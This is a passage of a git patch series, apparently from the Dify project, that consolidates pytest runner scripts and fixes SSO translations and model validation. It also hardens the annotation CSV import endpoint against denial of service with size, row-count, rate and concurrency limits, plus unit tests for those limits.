-SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/artifact_tests/ diff --git a/dev/pytest/pytest_full.sh b/dev/pytest/pytest_full.sh new file mode 100755 index 0000000000..2989a74ad8 --- /dev/null +++ b/dev/pytest/pytest_full.sh @@ -0,0 +1,58 @@ +#!/bin/bash +set -euo pipefail +set -ex + +SCRIPT_DIR="$(dirname "$(realpath "$0")")" +cd "$SCRIPT_DIR/../.." + +PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" + +# Ensure OpenDAL local storage works even if .env isn't loaded +export STORAGE_TYPE=${STORAGE_TYPE:-opendal} +export OPENDAL_SCHEME=${OPENDAL_SCHEME:-fs} +export OPENDAL_FS_ROOT=${OPENDAL_FS_ROOT:-/tmp/dify-storage} +mkdir -p "${OPENDAL_FS_ROOT}" + +# Prepare env files like CI +cp -n docker/.env.example docker/.env || true +cp -n docker/middleware.env.example docker/middleware.env || true +cp -n api/tests/integration_tests/.env.example api/tests/integration_tests/.env || true + +# Expose service ports (same as CI) without leaving the repo dirty +EXPOSE_BACKUPS=() +for f in docker/docker-compose.yaml docker/tidb/docker-compose.yaml; do + if [[ -f "$f" ]]; then + cp "$f" "$f.ci.bak" + EXPOSE_BACKUPS+=("$f") + fi +done +if command -v yq >/dev/null 2>&1; then + sh .github/workflows/expose_service_ports.sh || true +else + echo "skip expose_service_ports (yq not installed)" >&2 +fi + +# Optionally start middleware stack (db, redis, sandbox, ssrf proxy) to mirror CI +STARTED_MIDDLEWARE=0 +if [[ "${SKIP_MIDDLEWARE:-0}" != "1" ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env up -d db_postgres redis sandbox ssrf_proxy + STARTED_MIDDLEWARE=1 + # Give services a moment to come up + sleep 5 +fi + +cleanup() { + if [[ $STARTED_MIDDLEWARE -eq 1 ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env down + fi + for f in "${EXPOSE_BACKUPS[@]}"; do + mv "$f.ci.bak" "$f" + done +} +trap cleanup EXIT + +pytest --timeout "${PYTEST_TIMEOUT}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests diff --git a/dev/pytest/pytest_model_runtime.sh b/dev/pytest/pytest_model_runtime.sh deleted file mode 100755 index fd68dbe697..0000000000 --- a/dev/pytest/pytest_model_runtime.sh +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/model_runtime/anthropic \ - api/tests/integration_tests/model_runtime/azure_openai \ - api/tests/integration_tests/model_runtime/openai api/tests/integration_tests/model_runtime/chatglm \ - api/tests/integration_tests/model_runtime/google api/tests/integration_tests/model_runtime/xinference \ - api/tests/integration_tests/model_runtime/huggingface_hub/test_llm.py \ - api/tests/integration_tests/model_runtime/upstage \ - api/tests/integration_tests/model_runtime/fireworks \ - api/tests/integration_tests/model_runtime/nomic \ - api/tests/integration_tests/model_runtime/mixedbread \ - api/tests/integration_tests/model_runtime/voyage diff --git a/dev/pytest/pytest_testcontainers.sh b/dev/pytest/pytest_testcontainers.sh deleted file mode 100755 index f92f8821bf..0000000000 --- a/dev/pytest/pytest_testcontainers.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/test_containers_integration_tests diff --git a/dev/pytest/pytest_tools.sh b/dev/pytest/pytest_tools.sh deleted file mode 100755 index 989784f078..0000000000 --- a/dev/pytest/pytest_tools.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/tools diff --git a/dev/pytest/pytest_workflow.sh b/dev/pytest/pytest_workflow.sh deleted file mode 100755 index 941c8d3e7e..0000000000 --- a/dev/pytest/pytest_workflow.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/workflow From 714b4430771f1b940f6285941b3c9b7cc80f7f1f Mon Sep 17 00:00:00 2001 From: NeatGuyCoding <15627489+NeatGuyCoding@users.noreply.github.com> Date: Mon, 15 Dec 2025 14:58:33 +0800 Subject: [PATCH 23/68] fix: correct i18n SSO translations and fix validation/type issues (#29564) Signed-off-by: NeatGuyCoding <15627489+NeatGuyCoding@users.noreply.github.com> Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> --- api/controllers/service_api/app/completion.py | 3 +++ api/core/entities/knowledge_entities.py | 12 ++++++++++-- web/i18n/th-TH/billing.ts | 2 +- web/i18n/uk-UA/billing.ts | 2 +- 4 files changed, 15 insertions(+), 4 deletions(-) diff --git a/api/controllers/service_api/app/completion.py b/api/controllers/service_api/app/completion.py index b7fb01c6fe..b3836f3a47 100644 --- a/api/controllers/service_api/app/completion.py +++ b/api/controllers/service_api/app/completion.py @@ -61,6 +61,9 @@ class ChatRequestPayload(BaseModel): @classmethod def normalize_conversation_id(cls, value: str | UUID | None) -> str | None: """Allow missing or blank conversation IDs; enforce UUID format when provided.""" + if isinstance(value, str): + value = value.strip() + if not value: return None diff --git a/api/core/entities/knowledge_entities.py b/api/core/entities/knowledge_entities.py index bed3a35400..d4093b5245 100644 --- a/api/core/entities/knowledge_entities.py +++ b/api/core/entities/knowledge_entities.py @@ -1,4 +1,4 @@ -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator class PreviewDetail(BaseModel): @@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel): class PipelineDataset(BaseModel): id: str name: str - description: str | None = Field(default="", description="knowledge dataset description") + description: str = Field(default="", description="knowledge dataset description") chunk_structure: str + @field_validator("description", mode="before") + @classmethod + def normalize_description(cls, value: str | None) -> str: + """Coerce None to empty string so description is always a string.""" + if value is None: + return "" + return value + class PipelineDocument(BaseModel): id: str diff --git a/web/i18n/th-TH/billing.ts b/web/i18n/th-TH/billing.ts index 8d8273bdce..7c55baba60 100644 --- a/web/i18n/th-TH/billing.ts +++ b/web/i18n/th-TH/billing.ts @@ -137,7 +137,7 @@ const translation = { name: 'กิจการ', description: 'รับความสามารถและการสนับสนุนเต็มรูปแบบสําหรับระบบที่สําคัญต่อภารกิจขนาดใหญ่', includesTitle: 'ทุกอย่างในแผนทีม รวมถึง:', - features: ['โซลูชันการปรับใช้ที่ปรับขนาดได้สำหรับองค์กร', 'การอนุญาตใบอนุญาตเชิงพาณิชย์', 'ฟีเจอร์เฉพาะสำหรับองค์กร', 'หลายพื้นที่ทำงานและการจัดการองค์กร', 'ประกันสังคม', 'ข้อตกลง SLA ที่เจรจากับพันธมิตร Dify', 'ระบบความปลอดภัยและการควบคุมขั้นสูง', 'การอัปเดตและการบำรุงรักษาโดย Dify อย่างเป็นทางการ', 'การสนับสนุนทางเทคนิคระดับมืออาชีพ'], + features: ['โซลูชันการปรับใช้ที่ปรับขนาดได้สำหรับองค์กร', 'การอนุญาตใบอนุญาตเชิงพาณิชย์', 'ฟีเจอร์เฉพาะสำหรับองค์กร', 'หลายพื้นที่ทำงานและการจัดการองค์กร', 'ระบบลงชื่อเพียงครั้งเดียว (SSO)', 'ข้อตกลง SLA ที่เจรจากับพันธมิตร Dify', 'ระบบความปลอดภัยและการควบคุมขั้นสูง', 'การอัปเดตและการบำรุงรักษาโดย Dify อย่างเป็นทางการ', 'การสนับสนุนทางเทคนิคระดับมืออาชีพ'], btnText: 'ติดต่อฝ่ายขาย', price: 'ที่กำหนดเอง', for: 'สำหรับทีมขนาดใหญ่', diff --git a/web/i18n/uk-UA/billing.ts b/web/i18n/uk-UA/billing.ts index 76207fcec5..94bf0b0214 100644 --- a/web/i18n/uk-UA/billing.ts +++ b/web/i18n/uk-UA/billing.ts @@ -137,7 +137,7 @@ const translation = { name: 'Ентерпрайз', description: 'Отримайте повні можливості та підтримку для масштабних критично важливих систем.', includesTitle: 'Все, що входить до плану Team, плюс:', - features: ['Масштабовані рішення для розгортання корпоративного рівня', 'Авторизація комерційної ліцензії', 'Ексклюзивні корпоративні функції', 'Кілька робочих просторів та управління підприємством', 'ЄД', 'Узгоджені SLA партнерами Dify', 'Розширена безпека та контроль', 'Оновлення та обслуговування від Dify офіційно', 'Професійна технічна підтримка'], + features: ['Масштабовані рішення для розгортання корпоративного рівня', 'Авторизація комерційної ліцензії', 'Ексклюзивні корпоративні функції', 'Кілька робочих просторів та управління підприємством', 'ЄДИНА СИСТЕМА АВТОРИЗАЦІЇ', 'Узгоджені SLA партнерами Dify', 'Розширена безпека та контроль', 'Оновлення та обслуговування від Dify офіційно', 'Професійна технічна підтримка'], btnText: 'Зв\'язатися з відділом продажу', priceTip: 'Тільки річна оплата', for: 'Для великих команд', From 724cd57dbfcf51deaccbdc8789ed051d79696cb2 Mon Sep 17 00:00:00 2001 From: zyssyz123 <916125788@qq.com> Date: Mon, 15 Dec 2025 15:22:04 +0800 Subject: [PATCH 24/68] fix: dos in annotation import (#29470) Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- api/.env.example | 11 + api/configs/feature/__init__.py | 31 ++ api/controllers/console/app/annotation.py | 31 +- api/controllers/console/wraps.py | 88 +++++ api/services/annotation_service.py | 123 ++++++- .../batch_import_annotations_task.py | 11 + .../console/app/test_annotation_security.py | 344 ++++++++++++++++++ docker/.env.example | 11 + docker/docker-compose.yaml | 6 + 9 files changed, 643 insertions(+), 13 deletions(-) create mode 100644 api/tests/unit_tests/controllers/console/app/test_annotation_security.py diff --git a/api/.env.example b/api/.env.example index fb92199893..8c4ea617d4 100644 --- a/api/.env.example +++ b/api/.env.example @@ -670,3 +670,14 @@ SINGLE_CHUNK_ATTACHMENT_LIMIT=10 ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2 ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60 IMAGE_FILE_BATCH_LIMIT=10 + +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 \ No newline at end of file diff --git a/api/configs/feature/__init__.py b/api/configs/feature/__init__.py index 5c0edb60ac..b9091b5e2f 100644 --- a/api/configs/feature/__init__.py +++ b/api/configs/feature/__init__.py @@ -380,6 +380,37 @@ class FileUploadConfig(BaseSettings): default=60, ) + # Annotation Import Security Configurations + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field( + description="Maximum allowed CSV file size for annotation import in megabytes", + default=2, + ) + + ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field( + description="Maximum number of annotation records allowed in a single import", + default=10000, + ) + + ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field( + description="Minimum number of annotation records required in a single import", + default=1, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field( + description="Maximum number of annotation import requests per minute per tenant", + default=5, + ) + + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = Field( + description="Maximum number of annotation import requests per hour per tenant", + default=20, + ) + + ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field( + description="Maximum number of concurrent annotation import tasks per tenant", + default=2, + ) + inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field( description=( "Comma-separated list of file extensions that are blocked from upload. " diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 3b6fb58931..0aed36a7fd 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import request +from flask import abort, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError from controllers.console import console_ns from controllers.console.wraps import ( account_initialization_required, + annotation_import_concurrency_limit, + annotation_import_rate_limit, cloud_edition_billing_resource_check, edit_permission_required, setup_required, @@ -314,18 +316,25 @@ class AnnotationUpdateDeleteApi(Resource): @console_ns.route("/apps//annotations/batch-import") class AnnotationBatchImportApi(Resource): @console_ns.doc("batch_import_annotations") - @console_ns.doc(description="Batch import annotations from CSV file") + @console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response(200, "Batch import started successfully") @console_ns.response(403, "Insufficient permissions") @console_ns.response(400, "No file uploaded or too many files") + @console_ns.response(413, "File too large") + @console_ns.response(429, "Too many requests or concurrent imports") @setup_required @login_required @account_initialization_required @cloud_edition_billing_resource_check("annotation") + @annotation_import_rate_limit + @annotation_import_concurrency_limit @edit_permission_required def post(self, app_id): + from configs import dify_config + app_id = str(app_id) + # check file if "file" not in request.files: raise NoFileUploadedError() @@ -335,9 +344,27 @@ class AnnotationBatchImportApi(Resource): # get file from request file = request.files["file"] + # check file type if not file.filename or not file.filename.lower().endswith(".csv"): raise ValueError("Invalid file type. Only CSV files are allowed") + + # Check file size before processing + file.seek(0, 2) # Seek to end of file + file_size = file.tell() + file.seek(0) # Reset to beginning + + max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + if file_size > max_size_bytes: + abort( + 413, + f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. " + f"Please reduce the file size and try again.", + ) + + if file_size == 0: + raise ValueError("The uploaded file is empty") + return AppAnnotationService.batch_import_app_annotations(app_id, file) diff --git a/api/controllers/console/wraps.py b/api/controllers/console/wraps.py index f40f566a36..4654650c77 100644 --- a/api/controllers/console/wraps.py +++ b/api/controllers/console/wraps.py @@ -331,3 +331,91 @@ def is_admin_or_owner_required(f: Callable[P, R]): return f(*args, **kwargs) return decorated_function + + +def annotation_import_rate_limit(view: Callable[P, R]): + """ + Rate limiting decorator for annotation import operations. + + Implements sliding window rate limiting with two tiers: + - Short-term: Configurable requests per minute (default: 5) + - Long-term: Configurable requests per hour (default: 20) + + Uses Redis ZSET for distributed rate limiting across multiple instances. + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + # Check per-minute rate limit + minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min" + redis_client.zadd(minute_key, {current_time: current_time}) + redis_client.zremrangebyscore(minute_key, 0, current_time - 60000) + minute_count = redis_client.zcard(minute_key) + redis_client.expire(minute_key, 120) # 2 minutes TTL + + if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} " + f"requests per minute allowed. Please try again later.", + ) + + # Check per-hour rate limit + hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour" + redis_client.zadd(hour_key, {current_time: current_time}) + redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000) + hour_count = redis_client.zcard(hour_key) + redis_client.expire(hour_key, 7200) # 2 hours TTL + + if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} " + f"requests per hour allowed. Please try again later.", + ) + + return view(*args, **kwargs) + + return decorated + + +def annotation_import_concurrency_limit(view: Callable[P, R]): + """ + Concurrency control decorator for annotation import operations. + + Limits the number of concurrent import tasks per tenant to prevent + resource exhaustion and ensure fair resource allocation. + + Uses Redis ZSET to track active import jobs with automatic cleanup + of stale entries (jobs older than 2 minutes). + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + + # Clean up stale entries (jobs that should have completed or timed out) + stale_threshold = current_time - 120000 # 2 minutes ago + redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold) + + # Check current active job count + active_count = redis_client.zcard(active_jobs_key) + + if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT: + abort( + 429, + f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} " + f"concurrent imports allowed per workspace. Please wait for existing imports to complete.", + ) + + # Allow the request to proceed + # The actual job registration will happen in the service layer + return view(*args, **kwargs) + + return decorated diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py index 9258def907..f750186ab0 100644 --- a/api/services/annotation_service.py +++ b/api/services/annotation_service.py @@ -1,6 +1,9 @@ +import logging import uuid import pandas as pd + +logger = logging.getLogger(__name__) from sqlalchemy import or_, select from werkzeug.datastructures import FileStorage from werkzeug.exceptions import NotFound @@ -330,6 +333,18 @@ class AppAnnotationService: @classmethod def batch_import_app_annotations(cls, app_id, file: FileStorage): + """ + Batch import annotations from CSV file with enhanced security checks. + + Security features: + - File size validation + - Row count limits (min/max) + - Memory-efficient CSV parsing + - Subscription quota validation + - Concurrency tracking + """ + from configs import dify_config + # get app info current_user, current_tenant_id = current_account_with_tenant() app = ( @@ -341,16 +356,80 @@ class AppAnnotationService: if not app: raise NotFound("App not found") + job_id: str | None = None # Initialize to avoid unbound variable error try: - # Skip the first row - df = pd.read_csv(file.stream, dtype=str) - result = [] - for _, row in df.iterrows(): - content = {"question": row.iloc[0], "answer": row.iloc[1]} + # Quick row count check before full parsing (memory efficient) + # Read only first chunk to estimate row count + file.stream.seek(0) + first_chunk = file.stream.read(8192) # Read first 8KB + file.stream.seek(0) + + # Estimate row count from first chunk + newline_count = first_chunk.count(b"\n") + if newline_count == 0: + raise ValueError("The CSV file appears to be empty or invalid.") + + # Parse CSV with row limit to prevent memory exhaustion + # Use chunksize for memory-efficient processing + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS + + # Read CSV in chunks to avoid loading entire file into memory + df = pd.read_csv( + file.stream, + dtype=str, + nrows=max_records + 1, # Read one extra to detect overflow + engine="python", + on_bad_lines="skip", # Skip malformed lines instead of crashing + ) + + # Validate column count + if len(df.columns) < 2: + raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).") + + # Build result list with validation + result: list[dict] = [] + for idx, row in df.iterrows(): + # Stop if we exceed the limit + if len(result) >= max_records: + raise ValueError( + f"The CSV file contains too many records. Maximum {max_records} records allowed per import. " + f"Please split your file into smaller batches." + ) + + # Extract and validate question and answer + try: + question_raw = row.iloc[0] + answer_raw = row.iloc[1] + except (IndexError, KeyError): + continue # Skip malformed rows + + # Convert to string and strip whitespace + question = str(question_raw).strip() if question_raw is not None else "" + answer = str(answer_raw).strip() if answer_raw is not None else "" + + # Skip empty entries or NaN values + if not question or not answer or question.lower() == "nan" or answer.lower() == "nan": + continue + + # Validate length constraints (idx is pandas index, convert to int for display) + row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2 + if len(question) > 2000: + raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.") + if len(answer) > 10000: + raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.") + + content = {"question": question, "answer": answer} result.append(content) - if len(result) == 0: - raise ValueError("The CSV file is empty.") - # check annotation limit + + # Validate minimum records + if len(result) < min_records: + raise ValueError( + f"The CSV file must contain at least {min_records} valid annotation record(s). " + f"Found {len(result)} valid record(s)." + ) + + # Check annotation quota limit features = FeatureService.get_features(current_tenant_id) if features.billing.enabled: annotation_quota_limit = features.annotation_quota_limit @@ -359,12 +438,34 @@ class AppAnnotationService: # async job job_id = str(uuid.uuid4()) indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" - # send batch add segments task + + # Register job in active tasks list for concurrency tracking + current_time = int(naive_utc_now().timestamp() * 1000) + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zadd(active_jobs_key, {job_id: current_time}) + redis_client.expire(active_jobs_key, 7200) # 2 hours TTL + + # Set job status redis_client.setnx(indexing_cache_key, "waiting") batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id) - except Exception as e: + + except ValueError as e: return {"error_msg": str(e)} - return {"job_id": job_id, "job_status": "waiting"} + except Exception as e: + # Clean up active job registration on error (only if job was created) + if job_id is not None: + try: + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zrem(active_jobs_key, job_id) + except Exception: + # Silently ignore cleanup errors - the job will be auto-expired + logger.debug("Failed to clean up active job tracking during error handling") + + # Check if it's a CSV parsing error + error_str = str(e) + return {"error_msg": f"An error occurred while processing the file: {error_str}"} + + return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)} @classmethod def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit): diff --git a/api/tasks/annotation/batch_import_annotations_task.py b/api/tasks/annotation/batch_import_annotations_task.py index 8e46e8d0e3..775814318b 100644 --- a/api/tasks/annotation/batch_import_annotations_task.py +++ b/api/tasks/annotation/batch_import_annotations_task.py @@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green")) start_at = time.perf_counter() indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" + active_jobs_key = f"annotation_import_active:{tenant_id}" + # get app info app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first() @@ -91,4 +93,13 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: redis_client.setex(indexing_error_msg_key, 600, str(e)) logger.exception("Build index for batch import annotations failed") finally: + # Clean up active job tracking to release concurrency slot + try: + redis_client.zrem(active_jobs_key, job_id) + logger.debug("Released concurrency slot for job: %s", job_id) + except Exception as cleanup_error: + # Log but don't fail if cleanup fails - the job will be auto-expired + logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error) + + # Close database session db.session.close() diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py new file mode 100644 index 0000000000..36da3c264e --- /dev/null +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -0,0 +1,344 @@ +""" +Unit tests for annotation import security features. + +Tests rate limiting, concurrency control, file validation, and other +security features added to prevent DoS attacks on the annotation import endpoint. +""" + +import io +from unittest.mock import MagicMock, patch + +import pytest +from werkzeug.datastructures import FileStorage + +from configs import dify_config + + +class TestAnnotationImportRateLimiting: + """Test rate limiting for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account): + """Test that per-minute rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-minute limit + mock_redis.zcard.side_effect = [ + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1, # Minute check + 10, # Hour check + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + # Verify it's a rate limit error + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_per_hour_enforced(self, mock_redis, mock_current_account): + """Test that per-hour rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-hour limit + mock_redis.zcard.side_effect = [ + 3, # Minute check (under limit) + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1, # Hour check (over limit) + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account): + """Test that requests within limits are allowed.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate being under both limits + mock_redis.zcard.return_value = 2 + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + # Verify Redis operations were called + assert mock_redis.zadd.called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportConcurrencyControl: + """Test concurrency control for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_concurrency_limit_enforced(self, mock_redis, mock_current_account): + """Test that concurrent task limit is enforced.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate max concurrent tasks already running + mock_redis.zcard.return_value = dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower() + + def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account): + """Test that requests within concurrency limits are allowed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate being under concurrent task limit + mock_redis.zcard.return_value = 1 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account): + """Test that old/stale job entries are removed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + mock_redis.zcard.return_value = 0 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + dummy_view() + + # Verify cleanup was called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportFileValidation: + """Test file validation in annotation import.""" + + def test_file_size_limit_enforced(self): + """Test that files exceeding size limit are rejected.""" + # Create a file larger than the limit + max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + large_content = b"x" * (max_size + 1024) # Exceed by 1KB + + file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv") + + # Should be rejected in controller + # This would be tested in integration tests with actual endpoint + + def test_empty_file_rejected(self): + """Test that empty files are rejected.""" + file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv") + + # Should be rejected + # This would be tested in integration tests + + def test_non_csv_file_rejected(self): + """Test that non-CSV files are rejected.""" + file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain") + + # Should be rejected based on extension + # This would be tested in integration tests + + +class TestAnnotationImportServiceValidation: + """Test service layer validation for annotation import.""" + + @pytest.fixture + def mock_app(self): + """Mock application object.""" + app = MagicMock() + app.id = "app_id" + return app + + @pytest.fixture + def mock_db_session(self): + """Mock database session.""" + with patch("services.annotation_service.db.session") as mock: + yield mock + + def test_max_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too many records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with too many records + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + csv_content = "question,answer\n" + for i in range(max_records + 100): + csv_content += f"Question {i},Answer {i}\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about too many records + assert "error_msg" in result + assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower() + + def test_min_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too few valid records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with only header (no data rows) + csv_content = "question,answer\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = 